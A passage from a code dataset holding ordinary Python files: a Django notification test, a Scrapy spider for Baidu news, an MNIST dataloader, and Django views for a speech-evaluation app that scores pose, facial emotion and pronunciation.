self.assertEqual(get_notification_language(self.user), \"en_US\")\n self.assertRaises(LanguageStoreNotAvailable, get_notification_language, self.user2)\n setattr(settings, \"PINAX_NOTIFICATIONS_LANGUAGE_MODEL\", None)\n self.assertRaises(LanguageStoreNotAvailable, get_notification_language, self.user)\n\n @override_settings(SITE_ID=1, PINAX_NOTIFICATIONS_LANGUAGE_MODEL=\"tests.Language\")\n def test_send_now(self):\n Site.objects.create(domain=\"localhost\", name=\"localhost\")\n users = [self.user, self.user2]\n send_now(users, \"label\")\n self.assertEqual(len(mail.outbox), 2)\n self.assertIn(self.user.email, mail.outbox[0].to)\n self.assertIn(self.user2.email, mail.outbox[1].to)\n\n @override_settings(SITE_ID=1)\n def test_send(self):\n self.assertRaises(AssertionError, send, queue=True, now=True)\n\n users = [self.user, self.user2]\n send(users, \"label\", now=True)\n self.assertEqual(len(mail.outbox), 2)\n self.assertIn(self.user.email, mail.outbox[0].to)\n self.assertIn(self.user2.email, mail.outbox[1].to)\n\n send(users, \"label\", queue=True)\n self.assertEqual(NoticeQueueBatch.objects.count(), 1)\n batch = NoticeQueueBatch.objects.all()[0]\n notices = pickle.loads(base64.b64decode(batch.pickled_data))\n self.assertEqual(len(notices), 2)\n\n @override_settings(SITE_ID=1)\n def test_send_default(self):\n # default behaviout, 
send_now\n users = [self.user, self.user2]\n send(users, \"label\")\n self.assertEqual(len(mail.outbox), 2)\n self.assertEqual(NoticeQueueBatch.objects.count(), 0)\n\n @override_settings(SITE_ID=1)\n def test_queue_queryset(self):\n users = get_user_model().objects.all()\n queue(users, \"label\")\n self.assertEqual(len(mail.outbox), 0)\n self.assertEqual(NoticeQueueBatch.objects.count(), 1)\n","repo_name":"haystack/eyebrowse-server","sub_path":"notifications/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"3"} +{"seq_id":"30126948858","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\nfrom baidunews.items import BaidunewsItem\nimport re\nfrom scrapy.http import Request\n\nclass NewsSpider(scrapy.Spider):\n name = \"news\"\n #allowed_domains = [\"baidu.com\"]\n start_urls = ['http://baidu.com/']\n # 网站分类\n allid = ['LocalHouseNews', 'LocalNews']\n # 构造请求地址\n allurl = []\n for i in range(0, len(allid)):\n thisurl = \"http://news.baidu.com/widget?id=\" + allid[i] + \"&ajax=json\"\n allurl.append(thisurl)\n def parse(self, response):\n for j in range(0, len(self.allurl)):\n print(\"正在爬取第\" + str(j) + \"个栏目\")\n yield Request(self.allurl[j], callback = self.getData1)\n # 处理爬取到的数据\n def getData1(self, response):\n data = response.body.decode('utf-8', 'ignore')\n pat1 = '\"m_relate_url\":\"(.*?)\"'\n pat2 = '\"url\":\"(.*?)\"'\n # 提取json串中的文章url地址\n url1 = re.compile(pat1, re.S).findall(data)\n url2 = re.compile(pat2, re.S).findall(data)\n if(len(url1) != 0):\n url = url1\n else:\n url = url2\n for k in range(0, len(url)):\n articleurl = url[k]\n # 处理url中转义符号\\/\\/\n articleurl = re.sub('\\\\\\/', '/', articleurl)\n yield Request(articleurl, callback = self.getData2)\n def getData2(self, response):\n item = BaidunewsItem()\n item['link'] = response.url\n item['title'] = response.xpath(\"/html/head/title/text()\").extract()\n item['content'] = response.body\n yield item","repo_name":"gaoyaqiu/python-spider","sub_path":"baidunews/baidunews/spiders/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"3"} +{"seq_id":"17940982473","text":"import torch\nimport numpy as np\nfrom torchvision import datasets, transforms\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\n\ndef get_train_valid_dataset(train_batch=64, valid_batch=None):\n \"\"\"\n Creates a trainings and cross-validation dataset out of the original train dataset. 
The validation set contains\n    10,000 images and the training set contains 50,000 images.\n\n    :param train_batch: The size of each training set batch.\n    :param valid_batch: The size of each validation set batch.\n    :return: train_dataset: The dataset that is used for training of the network.\n    :return: valid_dataset: The dataset that is used for cross-validation of the network.\n    \"\"\"\n    transform = transforms.Compose([\n        transforms.ToTensor(),\n        transforms.Normalize((0.1307,), (0.3081,))\n    ])\n\n    dataset = datasets.MNIST('./dataset', train=True, download=True, transform=transform)\n    # valid_dataset = datasets.MNIST('../data', train=True, download=True, transform=transform)\n\n    # Creating data indices for training and validation splits:\n    dataset_size = len(dataset)\n    indices = list(range(dataset_size))\n    split = 10000\n\n    # shuffle dataset\n    np.random.seed(0)\n    np.random.shuffle(indices)\n    train_indices, val_indices = indices[split:], indices[:split]\n\n    # Creating PT data samplers and loaders:\n    train_sampler = SubsetRandomSampler(train_indices)\n    valid_sampler = SubsetRandomSampler(val_indices)\n\n    if valid_batch is None:\n        btx = split\n    else:\n        btx = valid_batch\n\n    # create loader for train and validation sets\n    train_loader = torch.utils.data.DataLoader(dataset, batch_size=train_batch, sampler=train_sampler)\n    validation_loader = torch.utils.data.DataLoader(dataset, batch_size=btx, sampler=valid_sampler)\n\n    return train_loader, validation_loader\n\n\ndef get_test_dataset():\n    \"\"\"\n    Get the test dataset loaded\n\n    :return: The test dataset\n    \"\"\"\n    transform = transforms.Compose([\n        transforms.ToTensor(),\n        transforms.Normalize((0.1307,), (0.3081,))\n    ])\n\n    return torch.utils.data.DataLoader(\n        datasets.MNIST('./dataset', train=False, download=True, transform=transform),\n        batch_size=100, shuffle=True)\n","repo_name":"innvariant/sparsity-experiments-2021","sub_path":"pruning-ffns/util/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
{"seq_id":"11753554926","text":"import datetime\r\nimport hashlib\r\nimport json\r\nimport os\r\nimport random\r\nimport shutil\r\nimport threading\r\nimport uuid\r\nimport xml.etree.ElementTree as ET\r\nimport mediapipe as mp\r\nimport numpy as np\r\nfrom deepface import DeepFace\r\nfrom django.core.files.base import ContentFile\r\nfrom django.core.files.storage import default_storage\r\nfrom django.http import HttpResponse, JsonResponse\r\nfrom django.shortcuts import render, redirect\r\nimport re\r\n# 解决 Forbidden (CSRF token missing or incorrect.)\r\nfrom speech_ai import settings\r\nfrom . 
import models\r\nfrom .MyForms import *\r\nfrom .fuc import findDb\r\nfrom .py.Recorder import Recorder\r\n\r\nimport cv2\r\nfrom mtcnn import MTCNN\r\nfrom PIL import Image\r\n\r\nfrom pathlib import Path\r\n\r\n# 项目根目录\r\nBaseDir = Path(__file__).resolve().parent.parent\r\nBaseDir = str(BaseDir).replace('\\\\', '/')\r\n# print(BaseDir)\r\n\r\n# 存放上一张图片的人体点位置\r\nlast_pose = {}\r\n\r\n\r\n# 姿态识别和保存为图片, 返回姿态位置\r\ndef picture(read_file, save_file=''):\r\n mp_drawing = mp.solutions.drawing_utils\r\n mp_drawing_styles = mp.solutions.drawing_styles\r\n mp_holistic = mp.solutions.holistic\r\n holistic = mp_holistic.Holistic(static_image_mode=True)\r\n\r\n image = cv2.imread(read_file)\r\n image_hight, image_width, _ = image.shape\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n results = holistic.process(image)\r\n\r\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in\r\n results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33 * 4)\r\n # Lh = np.array([[res.x, res.y, res.z] for res in results.left_hand_landmarks.landmark]).flatten() if results.left_hand_landmarks else np.zeros(21*3)\r\n # Rh = np.array([[res.x, res.y, res.z] for res in results.right_hand_landmarks.landmark]).flatten() if results.right_hand_landmarks else np.zeros(21*3)\r\n\r\n annotated_image = image.copy()\r\n mp_drawing.draw_landmarks(annotated_image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS,\r\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style())\r\n mp_drawing.draw_landmarks(annotated_image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS)\r\n mp_drawing.draw_landmarks(annotated_image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS)\r\n if save_file != '':\r\n cv2.imwrite(save_file, cv2.cvtColor(annotated_image, cv2.COLOR_RGB2BGR))\r\n\r\n return pose.reshape(-1, 4)\r\n\r\n\r\nstand_pose = picture(os.path.join(settings.MEDIA_ROOT, 'pose', '1.png').replace('\\\\', '/'))\r\n\r\n\r\n# 开始录制\r\ndef start_record(request): # pass 后端录制要改成前端录制\r\n # obj_record.start()\r\n response = HttpResponse(json.dumps({\"status\": 1}), content_type=\"application/json\")\r\n response[\"Access-Control-Allow-Origin\"] = \"*\"\r\n response[\"Access-Control-Allow-Methods\"] = \"POST, GET, OPTIONS\"\r\n response[\"Access-Control-Max-Age\"] = \"1000\"\r\n response[\"Access-Control-Allow-Headers\"] = \"*\"\r\n return response\r\n\r\n\r\n# 结束录制\r\ndef stop_record(request): # pass 后端录制要改成前端录制\r\n # obj_record.stop()\r\n response = HttpResponse(json.dumps({\"status\": 1}), content_type=\"application/json\")\r\n response[\"Access-Control-Allow-Origin\"] = \"*\"\r\n response[\"Access-Control-Allow-Methods\"] = \"POST, GET, OPTIONS\"\r\n response[\"Access-Control-Max-Age\"] = \"1000\"\r\n response[\"Access-Control-Allow-Headers\"] = \"*\"\r\n return response\r\n\r\n\r\n# 姿态识别 、 表情识别\r\n# @csrf_exempt\r\ndef speech(request):\r\n if request.session.get('user_name', None):\r\n if request.method == 'POST':\r\n backends = ['opencv', 'ssd', 'dlib', 'mtcnn', 'retinaface', 'mediapipe']\r\n user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n time = request.POST.get('time').replace('/', '-')\r\n time_name = time.replace(' ', '_').replace(':', '-')\r\n img_time = round(float(request.POST.get('imgTime')), 2)\r\n\r\n user_dir = os.path.join(settings.MEDIA_ROOT, 'pose', user.id).replace('\\\\', '/')\r\n date_dir = os.path.join(user_dir, time_name).replace('\\\\', '/')\r\n\r\n img_content = request.FILES.get('speech')\r\n if not 
os.path.isdir(user_dir):\r\n os.makedirs(user_dir)\r\n if not os.path.isdir(date_dir):\r\n os.makedirs(date_dir)\r\n\r\n file_name = request.POST.get('total') + '.png'\r\n file_name2 = request.POST.get('total') + '_' + '1' + '.png'\r\n\r\n file_path = date_dir + '/' + file_name\r\n save_file = date_dir + '/' + file_name2\r\n\r\n # with open(filePath, 'wb+') as f:\r\n # for chunk in imgContent.chunks():\r\n # f.write(chunk)\r\n default_storage.save(file_path, img_content)\r\n\r\n if request.POST.get('total') == '1':\r\n flag = True\r\n limbs = 0\r\n body = 0\r\n last_pose[user.id] = picture(file_path, save_file)\r\n score = poseScore(stand_pose, last_pose[user.id])\r\n\r\n else:\r\n test = picture(file_path, save_file)\r\n limbs = limbsChanges(last_pose[user.id], test)\r\n body = bodyDeviation(last_pose[user.id], test)\r\n if limbs + body > 1:\r\n flag = True\r\n else:\r\n flag = False\r\n score = poseScore(stand_pose, test)\r\n last_pose[user.id] = test\r\n\r\n # eps = DeepFace.analyze(img_path=file_path, detector_backend=backends[5], actions=('emotion',),\r\n # enforce_detection=False)\r\n eps = MyExpression(file_path)\r\n\r\n ret = {'eps': eps, 'status': True, 'tip': '成功执行'} # eps['dominant_emotion']\r\n\r\n pose = models.Pose.objects.create(\r\n uid=user.id,\r\n img='/media/pose/' + user.id + '/' + time_name + '/' + file_name,\r\n pose='/media/pose/' + user.id + '/' + time_name + '/' + file_name2,\r\n score=score, emotion=eps[0], emotion_prob=eps[1],\r\n flag=flag, limbsChanges=limbs, bodyDeviation=body,\r\n date=time, imgTime=img_time)\r\n pose.save()\r\n\r\n return JsonResponse(ret)\r\n else:\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n\r\n# 上传视频\r\ndef video(request):\r\n if request.method == 'POST':\r\n if request.session.get('user_name', None):\r\n user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n vid = request.FILES.get('video')\r\n videoExt = request.POST.get('videoExt')\r\n analyse_flag = request.POST.get('analyseFlag')\r\n time = request.POST.get('time').replace('/', '-')\r\n\r\n # 不存在则创建文件夹\r\n user_dir = os.path.join(settings.MEDIA_ROOT, 'pose', user.id).replace('\\\\', '/')\r\n time_name = request.POST.get('time').replace('/', '-').replace(' ', '_').replace(':', '-')\r\n date_dir = os.path.join(user_dir, time_name).replace('\\\\', '/')\r\n if not os.path.isdir(user_dir):\r\n os.makedirs(user_dir)\r\n if not os.path.isdir(date_dir):\r\n os.makedirs(date_dir)\r\n\r\n # 保存视频\r\n file_path = date_dir + '/1.' 
+ str(videoExt)\r\n default_storage.save(file_path, ContentFile(vid.read()))\r\n\r\n # flag 为 true 进行分析\r\n if analyse_flag == 'true':\r\n # 创建音视频分析线程\r\n video_thread = threading.Thread(target=video_analyse, args=(file_path, date_dir, user.id, time))\r\n audio_thread = threading.Thread(target=audio_analyse, args=(file_path, date_dir, user.id, time))\r\n\r\n # print(time, type(time))\r\n\r\n # 启动线程\r\n video_thread.start()\r\n audio_thread.start()\r\n # 等待所有线程完成\r\n video_thread.join()\r\n audio_thread.join()\r\n\r\n elif analyse_flag == 'false':\r\n audio_analyse(file_path, user.id, time)\r\n\r\n ret = {'tip': '分析完成', }\r\n return JsonResponse(ret)\r\n\r\n else:\r\n return redirect(\"/login/tip/您还未登�� !/\")\r\n\r\n\r\n# 音像分离\r\ndef convert_video_to_audio(file_path, date_dir):\r\n from pydub import AudioSegment\r\n from pydub.exceptions import CouldntDecodeError\r\n import os\r\n\r\n # print('经过此函数1')\r\n file_ext = os.path.splitext(file_path)[1]\r\n try:\r\n audio = AudioSegment.from_file(file_path, file_ext[1:])\r\n except CouldntDecodeError:\r\n raise Exception(f\" {file_ext} 格式不支持, 请使用 mp4, webm, flv,wav 等视频音频格式格式\")\r\n # 转换为单声道\r\n audio = audio.set_channels(1)\r\n\r\n # 转换为采样率16kHz\r\n audio = audio.set_frame_rate(16000)\r\n\r\n # 采样位数16位\r\n audio = audio.set_sample_width(2)\r\n\r\n # 保存为wav文件\r\n # 设置文件名字为源文件的前缀\r\n filename = os.path.basename(file_path)\r\n filename_without_extension = os.path.splitext(filename)[0]\r\n new_file_path = os.path.join(date_dir, filename_without_extension + \".wav\").replace(\"\\\\\", \"/\")\r\n audio.export(new_file_path, format=\"wav\")\r\n print('经过函数 convert_video_to_audio', new_file_path)\r\n return new_file_path\r\n\r\n\r\nfrom .py.EGG.text_audio_emo import text_audio_emo_predict\r\n\r\n\r\ndef audio_analyse(file_path, date_dir, uid, time):\r\n print('音频分析及发音准确度统计')\r\n # 提取音频\r\n audio_path = convert_video_to_audio(file_path, date_dir)\r\n\r\n # 对象声明\r\n obj = text_audio_emo_predict(audio_name=audio_path)\r\n result = obj.total_predict()\r\n text_ret = json.dumps(result[0])\r\n audio_ret = json.dumps(result[1])\r\n\r\n record = Recorder(audio_name=audio_path)\r\n # 执行中间过渡函数\r\n temp = record.betweenness()\r\n final_result = record.evaluation_audio()\r\n affix_score = final_result[0]\r\n global xml_list\r\n xml_list = final_result[1]\r\n length = len(xml_list)\r\n\r\n # 存储分数\r\n fc_list = []\r\n ic_list = []\r\n pc_list = []\r\n tc_list = []\r\n # 解析所有的XML文件并将它们拼接起来\r\n content_all = ''\r\n for i in range(len(xml_list)):\r\n # 先读取发音准确度可视化,再读取分数\r\n # 读取可视化\r\n tree = ET.parse(xml_list[i])\r\n root = tree.getroot()\r\n content_all += root.find('read_chapter').find('rec_paper').find('read_chapter').get('content')\r\n # 读取分数\r\n tmp_xml = record.get_xml_score(xml_list[i])\r\n fc_list.append(tmp_xml['fluency_score'])\r\n ic_list.append(tmp_xml['integrity_score'])\r\n pc_list.append(tmp_xml['phone_score'])\r\n tc_list.append(tmp_xml['tone_score'])\r\n # 继续可视化操作\r\n # 初始化字典,用于存储每个字的perr_msg属性\r\n perr_msg_dict = {}\r\n # 遍历XML文件中的所有word元素并更新字典\r\n for sentence in root.findall('.//sentence'):\r\n for word in sentence.findall('word'):\r\n word_content = word.get('content')\r\n phone_list = word.findall('syll/phone')\r\n\r\n # 统计phone元素中perr_msg属性值为0的个数\r\n perr_msg_count = sum(1 for phone in phone_list if phone.get('perr_msg') == '0')\r\n\r\n # 根据perr_msg的个数生成一个嵌套字典\r\n if perr_msg_count == 0:\r\n perr_msg_dict[word_content] = {'perr_msg': 2}\r\n elif perr_msg_count == 1:\r\n perr_msg_dict[word_content] = {'perr_msg': 1}\r\n else:\r\n 
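# at least two phones were read correctly, so the word is marked as well pronounced\r\n                    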
perr_msg_dict[word_content] = {'perr_msg': 0}\r\n    # 根据perr_msg属性在content_all上设置不同颜色的背景\r\n    content_colored = ''\r\n    for char in content_all:\r\n        if char in perr_msg_dict:\r\n            perr_msg = perr_msg_dict[char]['perr_msg']\r\n            if perr_msg == 0:\r\n                content_colored += f'<span style=\"background-color: #b7e1cd\">{char}</span>'\r\n            elif perr_msg == 1:\r\n                content_colored += f'<span style=\"background-color: #ffec8b\">{char}</span>'\r\n            elif perr_msg == 2:\r\n                content_colored += f'<span style=\"background-color: #dc6c64\">{char}</span>'\r\n            else:\r\n                content_colored += char\r\n    # 继续对分数的操作 取两位小数等\r\n    fc_list = [float(i) for i in fc_list]\r\n    ic_list = [float(i) for i in ic_list]\r\n    pc_list = [float(i) for i in pc_list]\r\n    tc_list = [float(i) for i in tc_list]\r\n\r\n    fluency_score = round(sum(fc_list) / length, 2)\r\n    integrity_score = round(sum(ic_list) / length, 2)\r\n    phone_score = round(sum(pc_list) / length, 2)\r\n    tone_score = round(sum(tc_list) / length, 2)\r\n    total_score = round(fluency_score * 0.4 + integrity_score * 0.1 +\r\n                        affix_score * 0.2 + phone_score * 0.15 + tone_score * 0.15, 2)\r\n\r\n    speech_temp = models.Speach.objects.create(\r\n        uid=uid, date=time, total_score=total_score,\r\n        fluency_score=fluency_score, integrity_score=integrity_score,\r\n        phone_score=phone_score, tone_score=tone_score, affix_score=affix_score,\r\n        video_path=file_path.replace('\\\\', '/').replace(BaseDir, ''), color_content=content_colored,\r\n        textual_emotion=text_ret, phonetic_emotion=audio_ret\r\n    )\r\n    speech_temp.save()\r\n\r\n\r\nimport dlib\r\nfrom PIL import Image\r\nfrom torchvision import transforms\r\nfrom torch.nn.functional import softmax\r\n\r\n# 加载模型\r\nimport torch\r\n\r\n# 加载已保存的模型\r\nmodel_path = BaseDir + '/media/weights/Expression.pth'\r\nmodel = torch.load(model_path, map_location=torch.device('cpu'))\r\n\r\n# 设置为评估模式\r\nmodel.eval()\r\n\r\n\r\ndef MyExpression(image_path):\r\n    emotion = ['anger', 'disgust', 'fear', 'happy', 'neutral', 'sad', 'surprise']\r\n\r\n    transform = transforms.Compose([\r\n        transforms.Resize((48, 48)),\r\n        transforms.ToTensor(),\r\n        transforms.Normalize(mean=[0.5], std=[0.5])\r\n    ])\r\n\r\n    # 装载dlib的人脸检测器\r\n    face_detector = dlib.get_frontal_face_detector()\r\n    image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\r\n\r\n    # 使用dlib检测人脸\r\n    faces = face_detector(image, 1)\r\n\r\n    if len(faces) == 0:\r\n        return 'neutral'\r\n\r\n    # 获取人脸区域\r\n    x, y, w, h = faces[0].left(), faces[0].top(), faces[0].width(), faces[0].height()\r\n\r\n    # 裁剪人脸\r\n    cropped_face = image[y:y + h, x:x + w]\r\n\r\n    # 将图像转换为PIL图像\r\n    face_image = Image.fromarray(cropped_face)\r\n\r\n    # 转换为模型所需的输入格式\r\n    face_image_rgb = face_image.convert('RGB')\r\n    face_tensor = transform(face_image_rgb).unsqueeze(0)\r\n\r\n    # 使用模型进行预测\r\n    output = model(face_tensor)\r\n\r\n    prediction = torch.argmax(output, 1)\r\n\r\n    # 计算置信度\r\n    probabilities = softmax(output, dim=1)\r\n    prob = probabilities.cpu().detach().numpy().max()\r\n\r\n    return [emotion[prediction.item()], prob]\r\n\r\n\r\n# 本地视频分析\r\ndef video_analyse(video_path, date_dir, uid, time):\r\n    print('视频分析及表情姿态统计')\r\n    video_path = video_path.replace('\\\\', '/')\r\n    vid = cv2.VideoCapture(video_path)\r\n\r\n    # 提取帧的频率\r\n    frame_rate = vid.get(cv2.CAP_PROP_FPS)\r\n    # 计算总帧数\r\n    frame_count = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))\r\n\r\n    # 计算每一帧的时间\r\n    frame_time = 1 / frame_rate\r\n\r\n    # 每隔几秒截取一帧\r\n    interval = 5\r\n\r\n    # 计算每隔 interval 秒需要截取的帧数\r\n    frames_to_capture = int(interval / frame_time)\r\n\r\n    print(\"总帧率:\", frame_count, \", 帧频率:\", frame_rate)\r\n\r\n    count = 1\r\n    for i in range(0, frame_count, frames_to_capture):\r\n        random_frame_index = random.randint(i, i + frames_to_capture)\r\n        
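# seek the capture to the randomly chosen frame before decoding it\r\n        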
vid.set(cv2.CAP_PROP_POS_FRAMES, random_frame_index)\r\n success, image = vid.read()\r\n\r\n if success:\r\n # cv2.imwrite(file_path, image)\r\n mp_drawing = mp.solutions.drawing_utils\r\n mp_drawing_styles = mp.solutions.drawing_styles\r\n mp_holistic = mp.solutions.holistic\r\n holistic = mp_holistic.Holistic(static_image_mode=True)\r\n\r\n # image = cv2.imread(file_path)\r\n image_height, image_width, _ = image.shape\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n results = holistic.process(image)\r\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in\r\n results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33 * 4)\r\n annotated_image = image.copy()\r\n mp_drawing.draw_landmarks(annotated_image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS,\r\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style())\r\n mp_drawing.draw_landmarks(annotated_image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS)\r\n mp_drawing.draw_landmarks(annotated_image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS)\r\n\r\n if pose.any() != 0:\r\n # try:\r\n # 原始图片\r\n file_path = os.path.join(date_dir, \"{}.jpg\".format(count)).replace('\\\\', '/')\r\n cv2.imwrite(file_path, cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\r\n\r\n # 人体关键点标记的图片\r\n pose_path = os.path.join(date_dir, \"{}_1.jpg\".format(count)).replace('\\\\', '/')\r\n cv2.imwrite(pose_path, cv2.cvtColor(annotated_image, cv2.COLOR_RGB2BGR))\r\n\r\n # 表情识别\r\n # backends = ['opencv', 'ssd', 'dlib', 'mtcnn', 'retinaface', 'mediapipe']\r\n # eps = DeepFace.analyze(img_path=file_path, detector_backend=backends[0], actions=('emotion',))\r\n\r\n eps = MyExpression(file_path)\r\n if eps is None:\r\n continue\r\n print(eps)\r\n\r\n if count == 1:\r\n last_pose[uid] = pose.reshape(-1, 4)\r\n limbs = 0\r\n body = 0\r\n flag = True\r\n else:\r\n test = pose.reshape(-1, 4)\r\n limbs = limbsChanges(last_pose[uid], test)\r\n body = bodyDeviation(last_pose[uid], test)\r\n if limbs + body > 1:\r\n flag = True\r\n else:\r\n flag = False\r\n last_pose[uid] = test\r\n\r\n img_time = round(random_frame_index * frame_time, 2)\r\n score = poseScore(stand_pose, pose.reshape(-1, 4))\r\n pose = models.Pose.objects.create(\r\n uid=uid,\r\n # 标记\r\n img=file_path.replace('\\\\', '/').replace(BaseDir, ''),\r\n pose=pose_path.replace('\\\\', '/').replace(BaseDir, ''),\r\n score=score, emotion=eps[0], emotion_prob=eps[1], # eps['dominant_emotion']\r\n flag=flag, limbsChanges=limbs, bodyDeviation=body,\r\n date=time, imgTime=img_time)\r\n pose.save()\r\n count += 1\r\n # except:\r\n # print(\"表情识别失败\")\r\n else:\r\n print(\"未识别到姿态\")\r\n else:\r\n print('截取图像未成功')\r\n vid.release()\r\n\r\n\r\n# 查分\r\ndef speachScore(request):\r\n if request.method == 'GET':\r\n uid = request.session.get('user_id')\r\n if uid:\r\n # user_name = request.session.get('user_name')\r\n dates = models.Speach.objects.filter(uid=uid).values('date').distinct()\r\n if len(dates) == 0:\r\n return redirect(\"/index/tip/请您先评测 !/\")\r\n dates = [i['date'] for i in list(dates)]\r\n date = dates[-1]\r\n\r\n return redirect('/login/score/' + date.strftime('%Y-%m-%d_%H:%M:%S'))\r\n else:\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n if request.method == 'POST':\r\n uid = request.session.get('user_id')\r\n date = request.POST.get('date')\r\n if uid:\r\n return redirect(\"/login/score/\" + date.replace(' ', '_'))\r\n else:\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n\r\n# 生成综合评价性文字\r\ndef 
generate_feedback(tone_score, phone_score, fluency_score, affix_score, body_score, accurate_ratio):\r\n feedback = []\r\n\r\n # 发音调型反馈\r\n if tone_score < 80:\r\n feedback.append(\"发音调型需要改进。请加强练习,关注声调的高低起伏,确保正确地表达每个音节的声调;\")\r\n elif tone_score < 90:\r\n feedback.append(\"发音调型较好,但仍有提升空间。继续关注声调的高低起伏,提高声调掌握程度;\")\r\n else:\r\n feedback.append(\"发音调型非常好。保持良好的声调掌握,确保演讲内容准确传达;\")\r\n\r\n # 发音韵律反馈\r\n if phone_score < 80:\r\n feedback.append(\"发音韵律方面存在问题。注意提高语速、音量和停顿的掌握,使演讲更具有吸引力;\")\r\n elif phone_score < 90:\r\n feedback.append(\"发音韵律较好,但仍有提升空间。继续关注语速、音量和停顿的掌握,使演讲更加动听;\")\r\n else:\r\n feedback.append(\"发音韵律非常好。保持良好的语速、音量和停顿掌握,为听众带来愉悦的听觉体验;\")\r\n\r\n # 演讲流畅度反馈\r\n if fluency_score < 75:\r\n feedback.append(\"演讲流畅度有待提高。多加练习,确保在演讲过程中不出现过多的停顿;\")\r\n elif fluency_score < 90:\r\n feedback.append(\"演讲流畅度较好,但仍有提升空间。继续练习,确保在演讲过程中流畅自如;\")\r\n else:\r\n feedback.append(\"演讲流畅度非常好。保持流畅的表达,让听众更容易理解演讲内容;\")\r\n\r\n # 演讲缀词冗余反馈\r\n if affix_score < 85:\r\n feedback.append(\"演讲中缀词和冗余表达较多。注意提高表达的简洁明了,避免使用过多的填充词;\")\r\n elif affix_score < 90:\r\n feedback.append(\"演讲中缀词和冗余表达较少,但仍有改进空间。继续提高表达的简洁明了,减少填充词的使用;\")\r\n else:\r\n feedback.append(\"演讲中缀词和冗余表达非常少。保持简洁明了的表达,使听众更容易理解演讲内容;\")\r\n\r\n # 人体姿态评估反馈\r\n if body_score < 60:\r\n feedback.append(\"人体姿态需要改进。注意保持自然放松的站姿,保持眼神交流,以增强与听众的互动;\")\r\n elif body_score < 80:\r\n feedback.append(\"人体姿态较好,但仍有提升空间。继续保持自然的站姿和眼神交流,提高演讲的表现力;\")\r\n else:\r\n feedback.append(\"人体姿态非常好。保持良好的站姿和眼神交流,为听众带来愉悦的视觉体验;\")\r\n\r\n # 发音准确性反馈\r\n if accurate_ratio < 0.6:\r\n feedback.append(\"发音准确性较低。请加强发音练习,提高发音准确性,确保听众能更好地理解演讲内容。\")\r\n elif accurate_ratio < 0.8:\r\n feedback.append(\"发音准确性较好,但仍有提升空间。继续加强发音练习,进一步提高发音准确性。\")\r\n else:\r\n feedback.append(\"发音准确性非常高。保持准确的发音,使听众更容易理解演讲内容。\")\r\n\r\n return feedback\r\n\r\n\r\ndef speachDateScore(request, date):\r\n if request.method == 'GET':\r\n uid = request.session.get('user_id')\r\n user_name = request.session.get('user_name')\r\n\r\n # date 进行处理\r\n date = datetime.datetime.strptime(date, '%Y-%m-%d_%H:%M:%S')\r\n # print(date)\r\n\r\n if uid:\r\n # 姿态\r\n exists = models.Speach.objects.filter(date=date).exists()\r\n\r\n if exists:\r\n dates = models.Speach.objects.filter(uid=uid).values('date').distinct()\r\n dates = [i['date'].strftime('%Y-%m-%d %H:%M:%S') for i in list(dates)]\r\n\r\n # 语音\r\n speech_table_value = list(models.Speach.objects.filter(uid=uid, date=date).values(\r\n 'content', 'fluency_score', 'integrity_score', 'phone_score', 'tone_score',\r\n 'affix_score', 'total_score', 'topic_score', 'color_content', 'textual_emotion',\r\n 'phonetic_emotion'))\r\n topic_score = speech_table_value[0]['topic_score']\r\n speech_table = [speech_table_value[0]['fluency_score'], speech_table_value[0]['integrity_score'],\r\n speech_table_value[0]['phone_score'], speech_table_value[0]['tone_score'],\r\n speech_table_value[0]['affix_score'], speech_table_value[0]['total_score'],\r\n ]\r\n # 文本情感\r\n text_emo = json.loads(speech_table_value[0]['textual_emotion'])\r\n text_emotion_dict = {'negative': 0.15, 'neutral': 0.5, 'positive': 0.85}\r\n text_emotion = []\r\n for i in range(len(text_emo)):\r\n if text_emo[i][0] == 'neutral':\r\n text_emotion.append(\r\n [text_emo[i][0], text_emotion_dict[text_emo[i][0]] + (text_emo[i][1] - 0.5) * 0.2])\r\n else:\r\n text_emotion.append(\r\n [text_emo[i][0], text_emotion_dict[text_emo[i][0]] + (text_emo[i][1] - 0.5) * 0.15])\r\n\r\n # 语音情感\r\n audio_emo = json.loads(speech_table_value[0]['phonetic_emotion'])\r\n audio_emotion_dict = {'angry': 0.15, 'anger': 0.15, 'fear': 0.15, 'sad': 0.15, 'neutral': 
